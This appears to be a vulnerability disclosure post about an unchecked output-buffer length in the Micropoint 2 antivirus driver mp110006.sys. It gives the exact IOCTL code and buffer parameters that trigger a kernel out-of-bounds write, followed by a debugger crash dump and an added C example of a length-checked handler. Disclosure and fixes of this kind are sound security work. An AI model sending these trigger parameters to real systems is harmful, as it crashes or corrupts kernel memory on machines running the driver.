Micropoint 2 (微点2) mp110006.sys driver 0day

Author: hack1990 Date: 12-05-30 Reads: 617

DeviceIoControl parameters:
ioControlCode=8000005E
inputAddress=0xD091BB5C
inputLen=0x00000000
outputAddress=0x022FF4A8
outputLen=0xA9E20D28
DeviceIoControl result: failed!
DeviceIoControl parameters:
ioControlCode=8000005E
inputAddress=0xD091BB5C
inputLen=0x00000000
outputAddress=0x022FF4A8
outputLen=0x00000020 (this length is never checked)
*** Fatal System Error: 0x000000d1
                       (0xFA0C1010, 0x00000002, 0x00000001, 0xF9B20972)
Break instruction exception - code 80000003 (first chance)
A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.
A fatal system error has occurred.


TRAP_FRAME:  f7f73aa4 -- (.trap 0xfffffffff7f73aa4)
ErrCode = 00000002
eax=00000000 ebx=80f73d80 ecx=00000000 edx=00000000 esi=fa0c0fe8 edi=fa0c0fec
eip=f9b20972 esp=f7f73b18 ebp=f7f73b48 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
mp110006!f1023+0x806:
f9b20972 894628          mov     dword ptr [esi+28h],eax ds:0023:fa0c1010=????????
               // The output length is 0x20, but mp110006 never checks it and writes straight to offset +0x28 in the buffer, causing the memory error!!!
Resetting default scope
LAST_CONTROL_TRANSFER:  from 804f89f7 to 80527fe8
STACK_TEXT: 
f7f73658 804f89f7 00000003 f7f739b4 00000000 nt!RtlpBreakWithStatusInstruction
f7f736a4 804f95e4 00000003 fa0c1010 f9b20972 nt!KiBugCheckDebugBreak+0x19
f7f73a84 80540a93 0000000a fa0c1010 00000002 nt!KeBugCheck2+0x574
f7f73a84 f9b20972 0000000a fa0c1010 00000002 nt!KiTrap0E+0x233
WARNING: Stack unwind information not available. Following frames may be wrong.
f7f73b48 f9b1f79c f7f73bac 00000028 00000020 mp110006!f1023+0x806
f7f73b64 f9d3ed75 f7f73bac fa0c04a8 80e82230 mp110006!f1015+0x22
f7f73bb4 804ef003 815b3830 811b2238 806d12d0 mp110005+0x2d75
f7f73bc4 80574e4e 811b22a8 80f8f5a8 811b2238 nt!IopfCallDriver+0x31
f7f73bd8 80575cdd 815b3830 811b2238 80f8f5a8 nt!IopSynchronousServiceTail+0x60
f7f73c80 8056e63a 00000184 00000000 00000000 nt!IopXxxControlFile+0x5e7
f7f73cb4 f746337f 00000184 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
f7f73d34 8053da48 00000184 00000000 00000000 BehaviorMon!HookNtDeviceIoControlFile+0xccf [e:\work\iocontrolfuzzer\behaviormon_driver\ssdt\ssdt.c @ 5112]
f7f73d34 7c92eb94 00000184 00000000 00000000 nt!KiFastCallEntry+0xf8
022ff410 7c92d8ef 7c801671 00000184 00000000 ntdll!KiFastSystemCallRet
022ff414 7c801671 00000184 00000000 00000000 ntdll!ZwDeviceIoControlFile+0xc
022ff474 0054c4a0 00000184 8000005e d091bb5c kernel32!DeviceIoControl+0xdd
022fffb4 7c80b699 00dafe70 77d70088 00000d34 BehaviorMon_400000+0x14c4a0
022fffe0 01cbff80 00000000 800005dc 00000000 kernel32!BaseThreadStart+0x37
022fffec 00000000 005585e8 00dafe70 00000000 0x1cbff80
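The missing length check, shown as an added user-mode C example that is not the driver's own code: a hardened handler for IOCTL 0x8000005E must compare OutputBufferLength against the highest offset it writes (0x28 + 4 = 0x2C) before touching the buffer, so the 0x20-byte request from the log is rejected with STATUS_BUFFER_TOO_SMALL instead of corrupting memory. The IoctlRequest structure and the mp_simulate helper are stand-ins for the IRP fields, constructed for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>

/* Values taken from the crash log above. */
#define IOCTL_MP_8000005E       0x8000005EUL
#define MP_OUT_FIELD_OFFSET     0x28u                 /* mov [esi+28h], eax  */
#define MP_OUT_FIELD_SIZE       sizeof(uint32_t)
#define MP_REQUIRED_OUT_LEN     (MP_OUT_FIELD_OFFSET + MP_OUT_FIELD_SIZE) /* 0x2C */

/* NTSTATUS codes as defined in ntstatus.h. */
typedef int32_t NTSTATUS;
#define STATUS_SUCCESS            ((NTSTATUS)0x00000000)
#define STATUS_BUFFER_TOO_SMALL   ((NTSTATUS)0xC0000023)
#define STATUS_INVALID_PARAMETER  ((NTSTATUS)0xC000000D)

/* Hypothetical stand-in for the METHOD_BUFFERED IRP fields the handler sees. */
typedef struct {
    uint32_t ioControlCode;
    void    *systemBuffer;        /* shared input/output buffer          */
    size_t   inputBufferLength;
    size_t   outputBufferLength;  /* the value mp110006 forgot to check  */
} IoctlRequest;

/* Hardened handler: validate the output length before writing offset 0x28. */
NTSTATUS mp_ioctl_checked(IoctlRequest *req, size_t *bytesReturned, uint32_t value)
{
    *bytesReturned = 0;
    if (req->ioControlCode != IOCTL_MP_8000005E)
        return STATUS_INVALID_PARAMETER;
    /* 0x20 < 0x2C: the request from the log stops here. */
    if (req->systemBuffer == NULL || req->outputBufferLength < MP_REQUIRED_OUT_LEN)
        return STATUS_BUFFER_TOO_SMALL;
    memcpy((uint8_t *)req->systemBuffer + MP_OUT_FIELD_OFFSET, &value, MP_OUT_FIELD_SIZE);
    *bytesReturned = MP_REQUIRED_OUT_LEN;
    return STATUS_SUCCESS;
}

/* Drive the handler with a constructed request of the given output length. */
NTSTATUS mp_simulate(size_t outLen, size_t *bytesReturned)
{
    uint8_t buf[0x40] = {0};      /* large enough that the test itself is safe */
    IoctlRequest req = { IOCTL_MP_8000005E, buf, 0, outLen };
    return mp_ioctl_checked(&req, bytesReturned, 0x41414141u);
}
```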
